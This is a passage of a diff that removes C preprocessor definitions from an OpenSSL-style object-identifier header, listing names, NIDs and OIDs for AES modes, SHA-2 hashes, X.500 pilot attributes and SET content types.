-#define SN_Experimental		"experimental"
-#define LN_Experimental		"Experimental"
-#define NID_Experimental		384
-#define OBJ_Experimental		OBJ_internet,3L
-
-#define SN_Private		"private"
-#define LN_Private		"Private"
-#define NID_Private		385
-#define OBJ_Private		OBJ_internet,4L
-
-#define SN_Security		"security"
-#define LN_Security		"Security"
-#define NID_Security		386
-#define OBJ_Security		OBJ_internet,5L
-
-#define SN_SNMPv2		"snmpv2"
-#define LN_SNMPv2		"SNMPv2"
-#define NID_SNMPv2		387
-#define OBJ_SNMPv2		OBJ_internet,6L
-
-#define LN_Mail		"Mail"
-#define NID_Mail		388
-#define OBJ_Mail		OBJ_internet,7L
-
-#define SN_Enterprises		"enterprises"
-#define LN_Enterprises		"Enterprises"
-#define NID_Enterprises		389
-#define OBJ_Enterprises		OBJ_Private,1L
-
-#define SN_dcObject		"dcobject"
-#define LN_dcObject		"dcObject"
-#define NID_dcObject		390
-#define OBJ_dcObject		OBJ_Enterprises,1466L,344L
-
-#define OBJ_extendedValidation		OBJ_Enterprises,311L,60L
-
-#define LN_jurisdictionLocalityName		"jurisdictionLocalityName"
-#define NID_jurisdictionLocalityName		956
-#define OBJ_jurisdictionLocalityName		OBJ_extendedValidation,2L,1L,1L
-
-#define LN_jurisdictionStateOrProvinceName		"jurisdictionStateOrProvinceName"
-#define NID_jurisdictionStateOrProvinceName		957
-#define OBJ_jurisdictionStateOrProvinceName		OBJ_extendedValidation,2L,1L,2L
-
-#define LN_jurisdictionCountryName		"jurisdictionCountryName"
-#define NID_jurisdictionCountryName		958
-#define OBJ_jurisdictionCountryName		OBJ_extendedValidation,2L,1L,3L
-
-#define SN_mime_mhs		"mime-mhs"
-#define LN_mime_mhs		"MIME MHS"
-#define NID_mime_mhs		504
-#define OBJ_mime_mhs		OBJ_Mail,1L
-
-#define SN_mime_mhs_headings		"mime-mhs-headings"
-#define LN_mime_mhs_headings		"mime-mhs-headings"
-#define NID_mime_mhs_headings		505
-#define OBJ_mime_mhs_headings		OBJ_mime_mhs,1L
-
-#define SN_mime_mhs_bodies		"mime-mhs-bodies"
-#define LN_mime_mhs_bodies		"mime-mhs-bodies"
-#define NID_mime_mhs_bodies		506
-#define OBJ_mime_mhs_bodies		OBJ_mime_mhs,2L
-
-#define SN_id_hex_partial_message		"id-hex-partial-message"
-#define LN_id_hex_partial_message		"id-hex-partial-message"
-#define NID_id_hex_partial_message		507
-#define OBJ_id_hex_partial_message		OBJ_mime_mhs_headings,1L
-
-#define SN_id_hex_multipart_message		"id-hex-multipart-message"
-#define LN_id_hex_multipart_message		"id-hex-multipart-message"
-#define NID_id_hex_multipart_message		508
-#define OBJ_id_hex_multipart_message		OBJ_mime_mhs_headings,2L
-
-#define SN_rle_compression		"RLE"
-#define LN_rle_compression		"run length compression"
-#define NID_rle_compression		124
-#define OBJ_rle_compression		1L,1L,1L,1L,666L,1L
-
-#define SN_zlib_compression		"ZLIB"
-#define LN_zlib_compression		"zlib compression"
-#define NID_zlib_compression		125
-#define OBJ_zlib_compression		OBJ_id_smime_alg,8L
-
-#define OBJ_csor		2L,16L,840L,1L,101L,3L
-
-#define OBJ_nistAlgorithms		OBJ_csor,4L
-
-#define OBJ_aes		OBJ_nistAlgorithms,1L
-
-#define SN_aes_128_ecb		"AES-128-ECB"
-#define LN_aes_128_ecb		"aes-128-ecb"
-#define NID_aes_128_ecb		418
-#define OBJ_aes_128_ecb		OBJ_aes,1L
-
-#define SN_aes_128_cbc		"AES-128-CBC"
-#define LN_aes_128_cbc		"aes-128-cbc"
-#define NID_aes_128_cbc		419
-#define OBJ_aes_128_cbc		OBJ_aes,2L
-
-#define SN_aes_128_ofb128		"AES-128-OFB"
-#define LN_aes_128_ofb128		"aes-128-ofb"
-#define NID_aes_128_ofb128		420
-#define OBJ_aes_128_ofb128		OBJ_aes,3L
-
-#define SN_aes_128_cfb128		"AES-128-CFB"
-#define LN_aes_128_cfb128		"aes-128-cfb"
-#define NID_aes_128_cfb128		421
-#define OBJ_aes_128_cfb128		OBJ_aes,4L
-
-#define SN_id_aes128_wrap		"id-aes128-wrap"
-#define NID_id_aes128_wrap		788
-#define OBJ_id_aes128_wrap		OBJ_aes,5L
-
-#define SN_aes_128_gcm		"id-aes128-GCM"
-#define LN_aes_128_gcm		"aes-128-gcm"
-#define NID_aes_128_gcm		895
-#define OBJ_aes_128_gcm		OBJ_aes,6L
-
-#define SN_aes_128_ccm		"id-aes128-CCM"
-#define LN_aes_128_ccm		"aes-128-ccm"
-#define NID_aes_128_ccm		896
-#define OBJ_aes_128_ccm		OBJ_aes,7L
-
-#define SN_id_aes128_wrap_pad		"id-aes128-wrap-pad"
-#define NID_id_aes128_wrap_pad		897
-#define OBJ_id_aes128_wrap_pad		OBJ_aes,8L
-
-#define SN_aes_192_ecb		"AES-192-ECB"
-#define LN_aes_192_ecb		"aes-192-ecb"
-#define NID_aes_192_ecb		422
-#define OBJ_aes_192_ecb		OBJ_aes,21L
-
-#define SN_aes_192_cbc		"AES-192-CBC"
-#define LN_aes_192_cbc		"aes-192-cbc"
-#define NID_aes_192_cbc		423
-#define OBJ_aes_192_cbc		OBJ_aes,22L
-
-#define SN_aes_192_ofb128		"AES-192-OFB"
-#define LN_aes_192_ofb128		"aes-192-ofb"
-#define NID_aes_192_ofb128		424
-#define OBJ_aes_192_ofb128		OBJ_aes,23L
-
-#define SN_aes_192_cfb128		"AES-192-CFB"
-#define LN_aes_192_cfb128		"aes-192-cfb"
-#define NID_aes_192_cfb128		425
-#define OBJ_aes_192_cfb128		OBJ_aes,24L
-
-#define SN_id_aes192_wrap		"id-aes192-wrap"
-#define NID_id_aes192_wrap		789
-#define OBJ_id_aes192_wrap		OBJ_aes,25L
-
-#define SN_aes_192_gcm		"id-aes192-GCM"
-#define LN_aes_192_gcm		"aes-192-gcm"
-#define NID_aes_192_gcm		898
-#define OBJ_aes_192_gcm		OBJ_aes,26L
-
-#define SN_aes_192_ccm		"id-aes192-CCM"
-#define LN_aes_192_ccm		"aes-192-ccm"
-#define NID_aes_192_ccm		899
-#define OBJ_aes_192_ccm		OBJ_aes,27L
-
-#define SN_id_aes192_wrap_pad		"id-aes192-wrap-pad"
-#define NID_id_aes192_wrap_pad		900
-#define OBJ_id_aes192_wrap_pad		OBJ_aes,28L
-
-#define SN_aes_256_ecb		"AES-256-ECB"
-#define LN_aes_256_ecb		"aes-256-ecb"
-#define NID_aes_256_ecb		426
-#define OBJ_aes_256_ecb		OBJ_aes,41L
-
-#define SN_aes_256_cbc		"AES-256-CBC"
-#define LN_aes_256_cbc		"aes-256-cbc"
-#define NID_aes_256_cbc		427
-#define OBJ_aes_256_cbc		OBJ_aes,42L
-
-#define SN_aes_256_ofb128		"AES-256-OFB"
-#define LN_aes_256_ofb128		"aes-256-ofb"
-#define NID_aes_256_ofb128		428
-#define OBJ_aes_256_ofb128		OBJ_aes,43L
-
-#define SN_aes_256_cfb128		"AES-256-CFB"
-#define LN_aes_256_cfb128		"aes-256-cfb"
-#define NID_aes_256_cfb128		429
-#define OBJ_aes_256_cfb128		OBJ_aes,44L
-
-#define SN_id_aes256_wrap		"id-aes256-wrap"
-#define NID_id_aes256_wrap		790
-#define OBJ_id_aes256_wrap		OBJ_aes,45L
-
-#define SN_aes_256_gcm		"id-aes256-GCM"
-#define LN_aes_256_gcm		"aes-256-gcm"
-#define NID_aes_256_gcm		901
-#define OBJ_aes_256_gcm		OBJ_aes,46L
-
-#define SN_aes_256_ccm		"id-aes256-CCM"
-#define LN_aes_256_ccm		"aes-256-ccm"
-#define NID_aes_256_ccm		902
-#define OBJ_aes_256_ccm		OBJ_aes,47L
-
-#define SN_id_aes256_wrap_pad		"id-aes256-wrap-pad"
-#define NID_id_aes256_wrap_pad		903
-#define OBJ_id_aes256_wrap_pad		OBJ_aes,48L
-
-#define SN_aes_128_cfb1		"AES-128-CFB1"
-#define LN_aes_128_cfb1		"aes-128-cfb1"
-#define NID_aes_128_cfb1		650
-
-#define SN_aes_192_cfb1		"AES-192-CFB1"
-#define LN_aes_192_cfb1		"aes-192-cfb1"
-#define NID_aes_192_cfb1		651
-
-#define SN_aes_256_cfb1		"AES-256-CFB1"
-#define LN_aes_256_cfb1		"aes-256-cfb1"
-#define NID_aes_256_cfb1		652
-
-#define SN_aes_128_cfb8		"AES-128-CFB8"
-#define LN_aes_128_cfb8		"aes-128-cfb8"
-#define NID_aes_128_cfb8		653
-
-#define SN_aes_192_cfb8		"AES-192-CFB8"
-#define LN_aes_192_cfb8		"aes-192-cfb8"
-#define NID_aes_192_cfb8		654
-
-#define SN_aes_256_cfb8		"AES-256-CFB8"
-#define LN_aes_256_cfb8		"aes-256-cfb8"
-#define NID_aes_256_cfb8		655
-
-#define SN_aes_128_ctr		"AES-128-CTR"
-#define LN_aes_128_ctr		"aes-128-ctr"
-#define NID_aes_128_ctr		904
-
-#define SN_aes_192_ctr		"AES-192-CTR"
-#define LN_aes_192_ctr		"aes-192-ctr"
-#define NID_aes_192_ctr		905
-
-#define SN_aes_256_ctr		"AES-256-CTR"
-#define LN_aes_256_ctr		"aes-256-ctr"
-#define NID_aes_256_ctr		906
-
-#define SN_aes_128_xts		"AES-128-XTS"
-#define LN_aes_128_xts		"aes-128-xts"
-#define NID_aes_128_xts		913
-
-#define SN_aes_256_xts		"AES-256-XTS"
-#define LN_aes_256_xts		"aes-256-xts"
-#define NID_aes_256_xts		914
-
-#define SN_des_cfb1		"DES-CFB1"
-#define LN_des_cfb1		"des-cfb1"
-#define NID_des_cfb1		656
-
-#define SN_des_cfb8		"DES-CFB8"
-#define LN_des_cfb8		"des-cfb8"
-#define NID_des_cfb8		657
-
-#define SN_des_ede3_cfb1		"DES-EDE3-CFB1"
-#define LN_des_ede3_cfb1		"des-ede3-cfb1"
-#define NID_des_ede3_cfb1		658
-
-#define SN_des_ede3_cfb8		"DES-EDE3-CFB8"
-#define LN_des_ede3_cfb8		"des-ede3-cfb8"
-#define NID_des_ede3_cfb8		659
-
-#define OBJ_nist_hashalgs		OBJ_nistAlgorithms,2L
-
-#define SN_sha256		"SHA256"
-#define LN_sha256		"sha256"
-#define NID_sha256		672
-#define OBJ_sha256		OBJ_nist_hashalgs,1L
-
-#define SN_sha384		"SHA384"
-#define LN_sha384		"sha384"
-#define NID_sha384		673
-#define OBJ_sha384		OBJ_nist_hashalgs,2L
-
-#define SN_sha512		"SHA512"
-#define LN_sha512		"sha512"
-#define NID_sha512		674
-#define OBJ_sha512		OBJ_nist_hashalgs,3L
-
-#define SN_sha224		"SHA224"
-#define LN_sha224		"sha224"
-#define NID_sha224		675
-#define OBJ_sha224		OBJ_nist_hashalgs,4L
-
-#define OBJ_dsa_with_sha2		OBJ_nistAlgorithms,3L
-
-#define SN_dsa_with_SHA224		"dsa_with_SHA224"
-#define NID_dsa_with_SHA224		802
-#define OBJ_dsa_with_SHA224		OBJ_dsa_with_sha2,1L
-
-#define SN_dsa_with_SHA256		"dsa_with_SHA256"
-#define NID_dsa_with_SHA256		803
-#define OBJ_dsa_with_SHA256		OBJ_dsa_with_sha2,2L
-
-#define SN_hold_instruction_code		"holdInstructionCode"
-#define LN_hold_instruction_code		"Hold Instruction Code"
-#define NID_hold_instruction_code		430
-#define OBJ_hold_instruction_code		OBJ_id_ce,23L
-
-#define OBJ_holdInstruction		OBJ_X9_57,2L
-
-#define SN_hold_instruction_none		"holdInstructionNone"
-#define LN_hold_instruction_none		"Hold Instruction None"
-#define NID_hold_instruction_none		431
-#define OBJ_hold_instruction_none		OBJ_holdInstruction,1L
-
-#define SN_hold_instruction_call_issuer		"holdInstructionCallIssuer"
-#define LN_hold_instruction_call_issuer		"Hold Instruction Call Issuer"
-#define NID_hold_instruction_call_issuer		432
-#define OBJ_hold_instruction_call_issuer		OBJ_holdInstruction,2L
-
-#define SN_hold_instruction_reject		"holdInstructionReject"
-#define LN_hold_instruction_reject		"Hold Instruction Reject"
-#define NID_hold_instruction_reject		433
-#define OBJ_hold_instruction_reject		OBJ_holdInstruction,3L
-
-#define SN_data		"data"
-#define NID_data		434
-#define OBJ_data		OBJ_itu_t,9L
-
-#define SN_pss		"pss"
-#define NID_pss		435
-#define OBJ_pss		OBJ_data,2342L
-
-#define SN_ucl		"ucl"
-#define NID_ucl		436
-#define OBJ_ucl		OBJ_pss,19200300L
-
-#define SN_pilot		"pilot"
-#define NID_pilot		437
-#define OBJ_pilot		OBJ_ucl,100L
-
-#define LN_pilotAttributeType		"pilotAttributeType"
-#define NID_pilotAttributeType		438
-#define OBJ_pilotAttributeType		OBJ_pilot,1L
-
-#define LN_pilotAttributeSyntax		"pilotAttributeSyntax"
-#define NID_pilotAttributeSyntax		439
-#define OBJ_pilotAttributeSyntax		OBJ_pilot,3L
-
-#define LN_pilotObjectClass		"pilotObjectClass"
-#define NID_pilotObjectClass		440
-#define OBJ_pilotObjectClass		OBJ_pilot,4L
-
-#define LN_pilotGroups		"pilotGroups"
-#define NID_pilotGroups		441
-#define OBJ_pilotGroups		OBJ_pilot,10L
-
-#define LN_iA5StringSyntax		"iA5StringSyntax"
-#define NID_iA5StringSyntax		442
-#define OBJ_iA5StringSyntax		OBJ_pilotAttributeSyntax,4L
-
-#define LN_caseIgnoreIA5StringSyntax		"caseIgnoreIA5StringSyntax"
-#define NID_caseIgnoreIA5StringSyntax		443
-#define OBJ_caseIgnoreIA5StringSyntax		OBJ_pilotAttributeSyntax,5L
-
-#define LN_pilotObject		"pilotObject"
-#define NID_pilotObject		444
-#define OBJ_pilotObject		OBJ_pilotObjectClass,3L
-
-#define LN_pilotPerson		"pilotPerson"
-#define NID_pilotPerson		445
-#define OBJ_pilotPerson		OBJ_pilotObjectClass,4L
-
-#define SN_account		"account"
-#define NID_account		446
-#define OBJ_account		OBJ_pilotObjectClass,5L
-
-#define SN_document		"document"
-#define NID_document		447
-#define OBJ_document		OBJ_pilotObjectClass,6L
-
-#define SN_room		"room"
-#define NID_room		448
-#define OBJ_room		OBJ_pilotObjectClass,7L
-
-#define LN_documentSeries		"documentSeries"
-#define NID_documentSeries		449
-#define OBJ_documentSeries		OBJ_pilotObjectClass,9L
-
-#define SN_Domain		"domain"
-#define LN_Domain		"Domain"
-#define NID_Domain		392
-#define OBJ_Domain		OBJ_pilotObjectClass,13L
-
-#define LN_rFC822localPart		"rFC822localPart"
-#define NID_rFC822localPart		450
-#define OBJ_rFC822localPart		OBJ_pilotObjectClass,14L
-
-#define LN_dNSDomain		"dNSDomain"
-#define NID_dNSDomain		451
-#define OBJ_dNSDomain		OBJ_pilotObjectClass,15L
-
-#define LN_domainRelatedObject		"domainRelatedObject"
-#define NID_domainRelatedObject		452
-#define OBJ_domainRelatedObject		OBJ_pilotObjectClass,17L
-
-#define LN_friendlyCountry		"friendlyCountry"
-#define NID_friendlyCountry		453
-#define OBJ_friendlyCountry		OBJ_pilotObjectClass,18L
-
-#define LN_simpleSecurityObject		"simpleSecurityObject"
-#define NID_simpleSecurityObject		454
-#define OBJ_simpleSecurityObject		OBJ_pilotObjectClass,19L
-
-#define LN_pilotOrganization		"pilotOrganization"
-#define NID_pilotOrganization		455
-#define OBJ_pilotOrganization		OBJ_pilotObjectClass,20L
-
-#define LN_pilotDSA		"pilotDSA"
-#define NID_pilotDSA		456
-#define OBJ_pilotDSA		OBJ_pilotObjectClass,21L
-
-#define LN_qualityLabelledData		"qualityLabelledData"
-#define NID_qualityLabelledData		457
-#define OBJ_qualityLabelledData		OBJ_pilotObjectClass,22L
-
-#define SN_userId		"UID"
-#define LN_userId		"userId"
-#define NID_userId		458
-#define OBJ_userId		OBJ_pilotAttributeType,1L
-
-#define LN_textEncodedORAddress		"textEncodedORAddress"
-#define NID_textEncodedORAddress		459
-#define OBJ_textEncodedORAddress		OBJ_pilotAttributeType,2L
-
-#define SN_rfc822Mailbox		"mail"
-#define LN_rfc822Mailbox		"rfc822Mailbox"
-#define NID_rfc822Mailbox		460
-#define OBJ_rfc822Mailbox		OBJ_pilotAttributeType,3L
-
-#define SN_info		"info"
-#define NID_info		461
-#define OBJ_info		OBJ_pilotAttributeType,4L
-
-#define LN_favouriteDrink		"favouriteDrink"
-#define NID_favouriteDrink		462
-#define OBJ_favouriteDrink		OBJ_pilotAttributeType,5L
-
-#define LN_roomNumber		"roomNumber"
-#define NID_roomNumber		463
-#define OBJ_roomNumber		OBJ_pilotAttributeType,6L
-
-#define SN_photo		"photo"
-#define NID_photo		464
-#define OBJ_photo		OBJ_pilotAttributeType,7L
-
-#define LN_userClass		"userClass"
-#define NID_userClass		465
-#define OBJ_userClass		OBJ_pilotAttributeType,8L
-
-#define SN_host		"host"
-#define NID_host		466
-#define OBJ_host		OBJ_pilotAttributeType,9L
-
-#define SN_manager		"manager"
-#define NID_manager		467
-#define OBJ_manager		OBJ_pilotAttributeType,10L
-
-#define LN_documentIdentifier		"documentIdentifier"
-#define NID_documentIdentifier		468
-#define OBJ_documentIdentifier		OBJ_pilotAttributeType,11L
-
-#define LN_documentTitle		"documentTitle"
-#define NID_documentTitle		469
-#define OBJ_documentTitle		OBJ_pilotAttributeType,12L
-
-#define LN_documentVersion		"documentVersion"
-#define NID_documentVersion		470
-#define OBJ_documentVersion		OBJ_pilotAttributeType,13L
-
-#define LN_documentAuthor		"documentAuthor"
-#define NID_documentAuthor		471
-#define OBJ_documentAuthor		OBJ_pilotAttributeType,14L
-
-#define LN_documentLocation		"documentLocation"
-#define NID_documentLocation		472
-#define OBJ_documentLocation		OBJ_pilotAttributeType,15L
-
-#define LN_homeTelephoneNumber		"homeTelephoneNumber"
-#define NID_homeTelephoneNumber		473
-#define OBJ_homeTelephoneNumber		OBJ_pilotAttributeType,20L
-
-#define SN_secretary		"secretary"
-#define NID_secretary		474
-#define OBJ_secretary		OBJ_pilotAttributeType,21L
-
-#define LN_otherMailbox		"otherMailbox"
-#define NID_otherMailbox		475
-#define OBJ_otherMailbox		OBJ_pilotAttributeType,22L
-
-#define LN_lastModifiedTime		"lastModifiedTime"
-#define NID_lastModifiedTime		476
-#define OBJ_lastModifiedTime		OBJ_pilotAttributeType,23L
-
-#define LN_lastModifiedBy		"lastModifiedBy"
-#define NID_lastModifiedBy		477
-#define OBJ_lastModifiedBy		OBJ_pilotAttributeType,24L
-
-#define SN_domainComponent		"DC"
-#define LN_domainComponent		"domainComponent"
-#define NID_domainComponent		391
-#define OBJ_domainComponent		OBJ_pilotAttributeType,25L
-
-#define LN_aRecord		"aRecord"
-#define NID_aRecord		478
-#define OBJ_aRecord		OBJ_pilotAttributeType,26L
-
-#define LN_pilotAttributeType27		"pilotAttributeType27"
-#define NID_pilotAttributeType27		479
-#define OBJ_pilotAttributeType27		OBJ_pilotAttributeType,27L
-
-#define LN_mXRecord		"mXRecord"
-#define NID_mXRecord		480
-#define OBJ_mXRecord		OBJ_pilotAttributeType,28L
-
-#define LN_nSRecord		"nSRecord"
-#define NID_nSRecord		481
-#define OBJ_nSRecord		OBJ_pilotAttributeType,29L
-
-#define LN_sOARecord		"sOARecord"
-#define NID_sOARecord		482
-#define OBJ_sOARecord		OBJ_pilotAttributeType,30L
-
-#define LN_cNAMERecord		"cNAMERecord"
-#define NID_cNAMERecord		483
-#define OBJ_cNAMERecord		OBJ_pilotAttributeType,31L
-
-#define LN_associatedDomain		"associatedDomain"
-#define NID_associatedDomain		484
-#define OBJ_associatedDomain		OBJ_pilotAttributeType,37L
-
-#define LN_associatedName		"associatedName"
-#define NID_associatedName		485
-#define OBJ_associatedName		OBJ_pilotAttributeType,38L
-
-#define LN_homePostalAddress		"homePostalAddress"
-#define NID_homePostalAddress		486
-#define OBJ_homePostalAddress		OBJ_pilotAttributeType,39L
-
-#define LN_personalTitle		"personalTitle"
-#define NID_personalTitle		487
-#define OBJ_personalTitle		OBJ_pilotAttributeType,40L
-
-#define LN_mobileTelephoneNumber		"mobileTelephoneNumber"
-#define NID_mobileTelephoneNumber		488
-#define OBJ_mobileTelephoneNumber		OBJ_pilotAttributeType,41L
-
-#define LN_pagerTelephoneNumber		"pagerTelephoneNumber"
-#define NID_pagerTelephoneNumber		489
-#define OBJ_pagerTelephoneNumber		OBJ_pilotAttributeType,42L
-
-#define LN_friendlyCountryName		"friendlyCountryName"
-#define NID_friendlyCountryName		490
-#define OBJ_friendlyCountryName		OBJ_pilotAttributeType,43L
-
-#define LN_organizationalStatus		"organizationalStatus"
-#define NID_organizationalStatus		491
-#define OBJ_organizationalStatus		OBJ_pilotAttributeType,45L
-
-#define LN_janetMailbox		"janetMailbox"
-#define NID_janetMailbox		492
-#define OBJ_janetMailbox		OBJ_pilotAttributeType,46L
-
-#define LN_mailPreferenceOption		"mailPreferenceOption"
-#define NID_mailPreferenceOption		493
-#define OBJ_mailPreferenceOption		OBJ_pilotAttributeType,47L
-
-#define LN_buildingName		"buildingName"
-#define NID_buildingName		494
-#define OBJ_buildingName		OBJ_pilotAttributeType,48L
-
-#define LN_dSAQuality		"dSAQuality"
-#define NID_dSAQuality		495
-#define OBJ_dSAQuality		OBJ_pilotAttributeType,49L
-
-#define LN_singleLevelQuality		"singleLevelQuality"
-#define NID_singleLevelQuality		496
-#define OBJ_singleLevelQuality		OBJ_pilotAttributeType,50L
-
-#define LN_subtreeMinimumQuality		"subtreeMinimumQuality"
-#define NID_subtreeMinimumQuality		497
-#define OBJ_subtreeMinimumQuality		OBJ_pilotAttributeType,51L
-
-#define LN_subtreeMaximumQuality		"subtreeMaximumQuality"
-#define NID_subtreeMaximumQuality		498
-#define OBJ_subtreeMaximumQuality		OBJ_pilotAttributeType,52L
-
-#define LN_personalSignature		"personalSignature"
-#define NID_personalSignature		499
-#define OBJ_personalSignature		OBJ_pilotAttributeType,53L
-
-#define LN_dITRedirect		"dITRedirect"
-#define NID_dITRedirect		500
-#define OBJ_dITRedirect		OBJ_pilotAttributeType,54L
-
-#define SN_audio		"audio"
-#define NID_audio		501
-#define OBJ_audio		OBJ_pilotAttributeType,55L
-
-#define LN_documentPublisher		"documentPublisher"
-#define NID_documentPublisher		502
-#define OBJ_documentPublisher		OBJ_pilotAttributeType,56L
-
-#define SN_id_set		"id-set"
-#define LN_id_set		"Secure Electronic Transactions"
-#define NID_id_set		512
-#define OBJ_id_set		OBJ_international_organizations,42L
-
-#define SN_set_ctype		"set-ctype"
-#define LN_set_ctype		"content types"
-#define NID_set_ctype		513
-#define OBJ_set_ctype		OBJ_id_set,0L
-
-#define SN_set_msgExt		"set-msgExt"
-#define LN_set_msgExt		"message extensions"
-#define NID_set_msgExt		514
-#define OBJ_set_msgExt		OBJ_id_set,1L
-
-#define SN_set_attr		"set-attr"
-#define NID_set_attr		515
-#define OBJ_set_attr		OBJ_id_set,3L
-
-#define SN_set_policy		"set-policy"
-#define NID_set_policy		516
-#define OBJ_set_policy		OBJ_id_set,5L
-
-#define SN_set_certExt		"set-certExt"
-#define LN_set_certExt		"certificate extensions"
-#define NID_set_certExt		517
-#define OBJ_set_certExt		OBJ_id_set,7L
-
-#define SN_set_brand		"set-brand"
-#define NID_set_brand		518
-#define OBJ_set_brand		OBJ_id_set,8L
-
-#define SN_setct_PANData		"setct-PANData"
-#define NID_setct_PANData		519
-#define OBJ_setct_PANData		OBJ_set_ctype,0L
-
-#define SN_setct_PANToken		"setct-PANToken"
-#define NID_setct_PANToken		520
-#define OBJ_setct_PANToken		OBJ_set_ctype,1L
-
-#define SN_setct_PANOnly		"setct-PANOnly"
-#define NID_setct_PANOnly		521
-#define OBJ_setct_PANOnly		OBJ_set_ctype,2L
-
-#define SN_setct_OIData		"setct-OIData"
-#define NID_setct_OIData		522
-#define OBJ_setct_OIData		OBJ_set_ctype,3L
-
-#define SN_setct_PI		"setct-PI"
-#define NID_setct_PI		523
-#define OBJ_setct_PI		OBJ_set_ctype,4L
-
-#define SN_setct_PIData		"setct-PIData"
-#define NID_setct_PIData		524
-#define OBJ_setct_PIData		OBJ_set_ctype,5L
-
-#define SN_setct_PIDataUnsigned		"setct-PIDataUnsigned"
-#define NID_setct_PIDataUnsigned		525
-#define OBJ_setct_PIDataUnsigned		OBJ_set_ctype,6L
-
-#define SN_setct_HODInput		"setct-HODInput"
-#define NID_setct_HODInput		526
-#define OBJ_setct_HODInput		OBJ_set_ctype,7L
-
-#define SN_setct_AuthResBaggage		"setct-AuthResBaggage"
-#define NID_setct_AuthResBaggage		527
-#define OBJ_setct_AuthResBaggage		OBJ_set_ctype,8L
-
-#define SN_setct_AuthRevReqBaggage		"setct-AuthRevReqBaggage"
-#define NID_setct_AuthRevReqBaggage		528
-#define OBJ_setct_AuthRevReqBaggage		OBJ_set_ctype,9L
-
-#define SN_setct_AuthRevResBaggage		"setct-AuthRevResBaggage"
-#define NID_setct_AuthRevResBaggage		529
-#define OBJ_setct_AuthRevResBaggage		OBJ_set_ctype,10L
-
-#define SN_setct_CapTokenSeq		"setct-CapTokenSeq"
-#define NID_setct_CapTokenSeq		530
-#define OBJ_setct_CapTokenSeq		OBJ_set_ctype,11L
-
-#define SN_setct_PInitResData		"setct-PInitResData"
-#define NID_setct_PInitResData		531
-#define OBJ_setct_PInitResData		OBJ_set_ctype,12L
-
-#define SN_setct_PI_TBS		"setct-PI-TBS"
-#define NID_setct_PI_TBS		532
-#define OBJ_setct_PI_TBS		OBJ_set_ctype,13L
-
-#define SN_setct_PResData		"setct-PResData"
-#define NID_setct_PResData		533
-#define OBJ_setct_PResData		OBJ_set_ctype,14L
-
-#define SN_setct_AuthReqTBS		"setct-AuthReqTBS"
-#define NID_setct_AuthReqTBS		534
-#define OBJ_setct_AuthReqTBS		OBJ_set_ctype,16L
-
-#define SN_setct_AuthResTBS		"setct-AuthResTBS"
-#define NID_setct_AuthResTBS		535
-#define OBJ_setct_AuthResTBS		OBJ_set_ctype,17L
-
-#define SN_setct_AuthResTBSX		"setct-AuthResTBSX"
-#define NID_setct_AuthResTBSX		536
-#define OBJ_setct_AuthResTBSX		OBJ_set_ctype,18L
-
-#define SN_setct_AuthTokenTBS		"setct-AuthTokenTBS"
-#define NID_setct_AuthTokenTBS		537
-#define OBJ_setct_AuthTokenTBS		OBJ_set_ctype,19L
-
-#define SN_setct_CapTokenData		"setct-CapTokenData"
-#define NID_setct_CapTokenData		538
-#define OBJ_setct_CapTokenData		OBJ_set_ctype,20L
-
-#define SN_setct_CapTokenTBS		"setct-CapTokenTBS"
-#define NID_setct_CapTokenTBS		539
-#define OBJ_setct_CapTokenTBS		OBJ_set_ctype,21L
-
-#define SN_setct_AcqCardCodeMsg		"setct-AcqCardCodeMsg"
-#define NID_setct_AcqCardCodeMsg		540
-#define OBJ_setct_AcqCardCodeMsg		OBJ_set_ctype,22L
-
-#define SN_setct_AuthRevReqTBS		"setct-AuthRevReqTBS"
-#define NID_setct_AuthRevReqTBS		541
-#define OBJ_setct_AuthRevReqTBS		OBJ_set_ctype,23L
-
-#define SN_setct_AuthRevResData		"setct-AuthRevResData"
-#define NID_setct_AuthRevResData		542
-#define OBJ_setct_AuthRevResData		OBJ_set_ctype,24L
-
-#define SN_setct_AuthRevResTBS		"setct-AuthRevResTBS"
-#define NID_setct_AuthRevResTBS		543
-#define OBJ_setct_AuthRevResTBS		OBJ_set_ctype,25L
-
-#define SN_setct_CapReqTBS		"setct-CapReqTBS"
-#define NID_setct_CapReqTBS		544
-#define OBJ_setct_CapReqTBS		OBJ_set_ctype,26L
-
-#define SN_setct_CapReqTBSX		"setct-CapReqTBSX"
-#define NID_setct_CapReqTBSX		545
-#define OBJ_setct_CapReqTBSX		OBJ_set_ctype,27L
-
-#define SN_setct_CapResData		"setct-CapResData"
-#define NID_setct_CapResData		546
-#define OBJ_setct_CapResData		OBJ_set_ctype,28L
-
-#define SN_setct_CapRevReqTBS		"setct-CapRevReqTBS"
-#define NID_setct_CapRevReqTBS		547
-#define OBJ_setct_CapRevReqTBS		OBJ_set_ctype,29L
-
-#define SN_setct_CapRevReqTBSX		"setct-CapRevReqTBSX"
-#define NID_setct_CapRevReqTBSX		548
-#define OBJ_setct_CapRevReqTBSX		OBJ_set_ctype,30L
-
-#define SN_setct_CapRevResData		"setct-CapRevResData"
-#define NID_setct_CapRevResData		549
-#define OBJ_setct_CapRevResData		OBJ_set_ctype,31L
-
-#define SN_setct_CredReqTBS		"setct-CredReqTBS"
-#define NID_setct_CredReqTBS		550
-#define OBJ_setct_CredReqTBS		OBJ_set_ctype,32L
-
-#define SN_setct_CredReqTBSX		"setct-CredReqTBSX"
-#define NID_setct_CredReqTBSX		551
-#define OBJ_setct_CredReqTBSX		OBJ_set_ctype,33L
-
-#define SN_setct_CredResData		"setct-CredResData"
-#define NID_setct_CredResData		552
-#define OBJ_setct_CredResData		OBJ_set_ctype,34L
-
-#define SN_setct_CredRevReqTBS		"setct-CredRevReqTBS"
-#define NID_setct_CredRevReqTBS		553
-#define OBJ_setct_CredRevReqTBS		OBJ_set_ctype,35L
-
-#define SN_setct_CredRevReqTBSX		"setct-CredRevReqTBSX"
-#define NID_setct_CredRevReqTBSX		554
-#define OBJ_setct_CredRevReqTBSX		OBJ_set_ctype,36L
-
-#define SN_setct_CredRevResData		"setct-CredRevResData"
-#define NID_setct_CredRevResData		555
-#define OBJ_setct_CredRevResData		OBJ_set_ctype,37L
-
-#define SN_setct_PCertReqData		"setct-PCertReqData"
-#define NID_setct_PCertReqData		556
-#define OBJ_setct_PCertReqData		OBJ_set_ctype,38L
-
-#define SN_setct_PCertResTBS		"setct-PCertResTBS"
-#define NID_setct_PCertResTBS		557
-#define OBJ_setct_PCertResTBS		OBJ_set_ctype,39L
-
-#define SN_setct_BatchAdminReqData		"setct-BatchAdminReqData"
-#define NID_setct_BatchAdminReqData		558
-#define OBJ_setct_BatchAdminReqData		OBJ_set_ctype,40L
-
